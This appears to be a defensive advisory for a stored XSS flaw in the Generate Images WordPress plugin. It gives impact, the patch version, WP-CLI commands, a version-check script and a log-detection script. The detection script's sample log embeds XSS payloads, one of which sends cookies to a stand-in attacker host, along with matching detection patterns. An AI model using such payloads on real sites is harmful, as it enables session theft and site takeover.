CVE-2024-6724
📋 TL;DR
The Generate Images WordPress plugin before version 5.2.8 does not sanitise and escape some of its settings, leaving a stored cross-site scripting (XSS) flaw. A high-privilege user such as an administrator can save a script payload in a setting, and it executes in the browser of anyone who later loads the page that renders that setting. WordPress normally lets administrators post arbitrary HTML, so the bug matters chiefly where the unfiltered_html capability is disallowed, for example on multisite installations, where site administrators are not supposed to be able to store active content at all. Only WordPress sites running a vulnerable version of this specific plugin are affected.
💻 Affected Systems
- Generate Images WordPress Plugin
📦 What is this software?
Generate Images, by Magic Post Thumbnail (the plugin is also known by its earlier name, Magic Post Thumbnail). Because the display name and the directory slug may differ, confirm the installed slug with wp plugin list before running any slug-based command.
⚠️ Risk & Real-World Impact
Worst Case
The payload runs in the browser of another administrator or super admin who views the affected page. Script executing in that context can reuse the victim's session and nonces to create a new administrator, install or upload a plugin, or edit theme files, which on WordPress amounts to remote code execution and full site compromise.
Likely Case
On a multisite install, a site administrator (who lacks unfiltered_html) or an attacker holding a compromised admin account plants a payload that fires when a super admin opens the settings page, escalating to network-wide control or stealing data from the victim's session.
If Mitigated
Where administrators already hold unfiltered_html and admin accounts are trusted and protected, the bug adds little beyond what those accounts can already do; the impact is limited to an administrator deliberately misusing their privileges.
🎯 Exploit Status
Exploitation requires administrative privileges: the payload is saved through the plugin's settings page, which only administrators can modify, and it executes when a victim loads a page that renders the unescaped setting.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.2.8
Vendor Advisory: https://wpscan.com/vulnerability/0cb3158a-263d-4c4a-8029-62b453c281cb/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the 'Generate Images' plugin.
4. Click 'Update Now' if an update is available.
5. Alternatively, download version 5.2.8 or later from the WordPress plugin repository and update manually.
🔧 Temporary Workarounds
Remove vulnerable plugin
Temporarily deactivate or remove the Generate Images plugin until the patched version can be installed. The commands below assume the plugin's directory slug is generate-images; since the plugin is also known as Magic Post Thumbnail, confirm the slug with wp plugin list first.
wp plugin deactivate generate-images
wp plugin delete generate-images
Restrict admin access
Temporarily restrict administrative access to essential, trusted users only. On multisite, review site administrators as well as super admins, since site administrators are exactly the accounts the unfiltered_html restriction is meant to contain.
🧯 If You Can't Patch
- Implement strict access controls for WordPress admin accounts with multi-factor authentication
- Regularly audit admin user activity and plugin settings for unauthorized changes
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin panel → Plugins → Installed Plugins → Generate Images version. If version is below 5.2.8, system is vulnerable.
Check Version (substitute the actual directory slug if it differs; wp plugin list with no filter shows every installed slug):
wp plugin list --name=generate-images --field=version
Verify Fix Applied:
After updating, verify Generate Images plugin shows version 5.2.8 or higher in WordPress admin plugins list.
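The following Python script is an added example for this advisory, not code from the plugin, from WordPress or from WP-CLI. It reads the standard "Version:" plugin header that WordPress parses from the plugin's main PHP file and compares it numerically against 5.2.8, which avoids the classic mistake of comparing version strings lexically (where "5.2.10" sorts below "5.2.8"). The main file's name depends on the plugin's directory slug and is not assumed; the headers embedded below are constructed samples, and a missing header is deliberately reported as vulnerable rather than as patched.

```python
"""Decide whether an installed copy of the plugin predates the fixed release.

Added example for this advisory; not code from the plugin, WordPress or
WP-CLI. Input is the text of the plugin's main PHP file (path not assumed).
"""
import re

FIXED_VERSION = "5.2.8"

# WordPress plugin headers are "Key: value" lines inside the leading comment;
# the leading "*" or "#" of a comment line is skipped.
VERSION_RE = re.compile(r"^[\s*#]*Version:\s*(\S+)", re.IGNORECASE | re.MULTILINE)


def parse_version(version: str) -> tuple:
    """Turn '5.2.10' into (5, 2, 10) so comparison is numeric.

    Parsing stops at the first non-numeric component, so a pre-release tag
    such as '5.2.8-beta' is ignored and should be reviewed by hand.
    """
    parts = []
    for piece in version.split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def is_vulnerable(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when version < fixed; shorter tuples are zero-padded so that
    '5.2' and '5.2.0' compare equal."""
    a, b = parse_version(version), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


def header_version(plugin_main_file_text: str):
    """Return the Version header value, or None if the header is missing."""
    match = VERSION_RE.search(plugin_main_file_text)
    return match.group(1) if match else None


def assess(plugin_main_file_text: str) -> dict:
    version = header_version(plugin_main_file_text)
    return {
        "version": version,
        # An unreadable header is treated as vulnerable: unknown is not "patched".
        "vulnerable": True if version is None else is_vulnerable(version),
    }


# Constructed sample headers for three hypothetical installs; real headers
# carry more fields (Plugin URI, Author, ...).
SAMPLE_HEADERS = {
    "site-a": "<?php\n/**\n * Plugin Name: Generate Images\n * Version: 5.2.7\n */\n",
    "site-b": "<?php\n/*\nPlugin Name: Generate Images\nVersion: 5.2.10\n*/\n",
    "site-c": "<?php\n// header stripped by a broken deploy\n",
}


def vulnerable_sites(headers: dict) -> list:
    """Names of installs whose plugin copy must be updated or reviewed."""
    return [name for name, text in headers.items() if assess(text)["vulnerable"]]


if __name__ == "__main__":
    for name, text in SAMPLE_HEADERS.items():
        print(name, assess(text))
```

Point the script at the real file by reading it into a string and calling assess(); for a fleet of separate installs, feed one header per site into vulnerable_sites() to get the list that still needs the update.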
📡 Detection & Monitoring
Log Indicators:
- WordPress core keeps no audit log, so these indicators assume an audit-logging plugin or database-level logging of changes to wp_options
- Updates to the plugin's settings whose new value contains markup: <script, <svg, <iframe, an on*= event handler, or a javascript: URL (values may be stored HTML-entity-encoded, so decode before matching)
- Settings changes by a site administrator on a multisite install, where unfiltered_html is disallowed and stored script indicates this bug rather than a permitted use of HTML
- Bursts of admin logins or settings changes from an account or source address that does not normally administer the site
Network Indicators:
- POST requests to wp-admin/options.php or the plugin's settings page carrying script tags or event handlers in the body; visible only where request bodies are logged (WAF, reverse proxy), not in standard access logs
SIEM Query (illustrative; field names depend on the audit-logging source, and the option-name prefix is an assumption to check against the plugin's actual rows in wp_options):
source="wordpress" AND event="option_updated" AND option_name LIKE "generate_images*" AND (value CONTAINS "<script" OR value CONTAINS "onerror=" OR value CONTAINS "javascript:")
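As an added example (not part of the original advisory or of any logging product), the Python script below runs the detection logic above over audited settings changes. It assumes an audit-logging plugin that records option updates as JSON lines with the fields used here; the field names, the generate_images_ option prefix and the sample events are all constructed for illustration. Stored values are HTML-entity-decoded before matching, since a logging layer may escape them, and a hit from an account that lacks unfiltered_html is rated higher because that is precisely the case this bug exists for.

```python
"""Flag stored-XSS style payloads in audited WordPress settings changes.

Added example for this advisory, not code from the plugin or from any
logging product. Log format, field names and option prefix are assumptions.
"""
import html
import json
import re

# Assumed prefix for the plugin's option names; verify against wp_options.
PLUGIN_OPTION_PREFIX = "generate_images_"

# Heuristic patterns that should never appear in a plain-text plugin setting.
PAYLOAD_PATTERNS = [
    re.compile(r"<\s*script\b", re.IGNORECASE),
    re.compile(r"<\s*(iframe|object|embed|svg)\b", re.IGNORECASE),
    re.compile(r"<[^>]*\bon[a-z]+\s*=", re.IGNORECASE),  # onerror=, onload=, ... inside a tag
    re.compile(r"javascript\s*:", re.IGNORECASE),
]

# Constructed sample audit events (one JSON object per line).
SAMPLE_LOG = """\
{"ts":"2024-07-01T10:02:11Z","user":"alice","role":"administrator","unfiltered_html":false,"event":"option_updated","option":"generate_images_api_key","value":"sk-live-abc123"}
{"ts":"2024-07-01T10:05:40Z","user":"alice","role":"administrator","unfiltered_html":false,"event":"option_updated","option":"generate_images_prefix","value":"<img src=x onerror=alert(document.cookie)>"}
{"ts":"2024-07-01T10:06:02Z","user":"bob","role":"administrator","unfiltered_html":true,"event":"option_updated","option":"generate_images_prefix","value":"&lt;script&gt;fetch('//evil.example/'+document.cookie)&lt;/script&gt;"}
{"ts":"2024-07-01T10:07:15Z","user":"carol","role":"editor","event":"post_updated","option":"","value":"<script>alert(1)</script>"}
"""


def normalize(value: str) -> str:
    """Decode HTML entities twice so single- and double-encoded payloads are
    compared in the form a browser would eventually render."""
    return html.unescape(html.unescape(value))


def suspicious_patterns(value: str) -> list:
    """Return the patterns that match the decoded value (empty list = clean)."""
    text = normalize(value)
    return [p.pattern for p in PAYLOAD_PATTERNS if p.search(text)]


def scan(log_text: str, prefix: str = PLUGIN_OPTION_PREFIX) -> list:
    """Scan JSON-lines audit events and return findings for the plugin's options."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if event.get("event") != "option_updated":
            continue
        if not event.get("option", "").startswith(prefix):
            continue
        hits = suspicious_patterns(str(event.get("value", "")))
        if not hits:
            continue
        # Where unfiltered_html is disallowed (multisite site admins), stored
        # markup should be impossible, so the finding carries more weight.
        lacks_unfiltered_html = not event.get("unfiltered_html", True)
        findings.append({
            "ts": event["ts"],
            "user": event["user"],
            "option": event["option"],
            "patterns": hits,
            "severity": "high" if lacks_unfiltered_html else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Wire scan() to the exported audit log of your WordPress logging plugin and adjust PLUGIN_OPTION_PREFIX and the field names to match that source; the patterns are a heuristic and will not catch every obfuscated payload, so treat a clean result as absence of known indicators, not proof of safety.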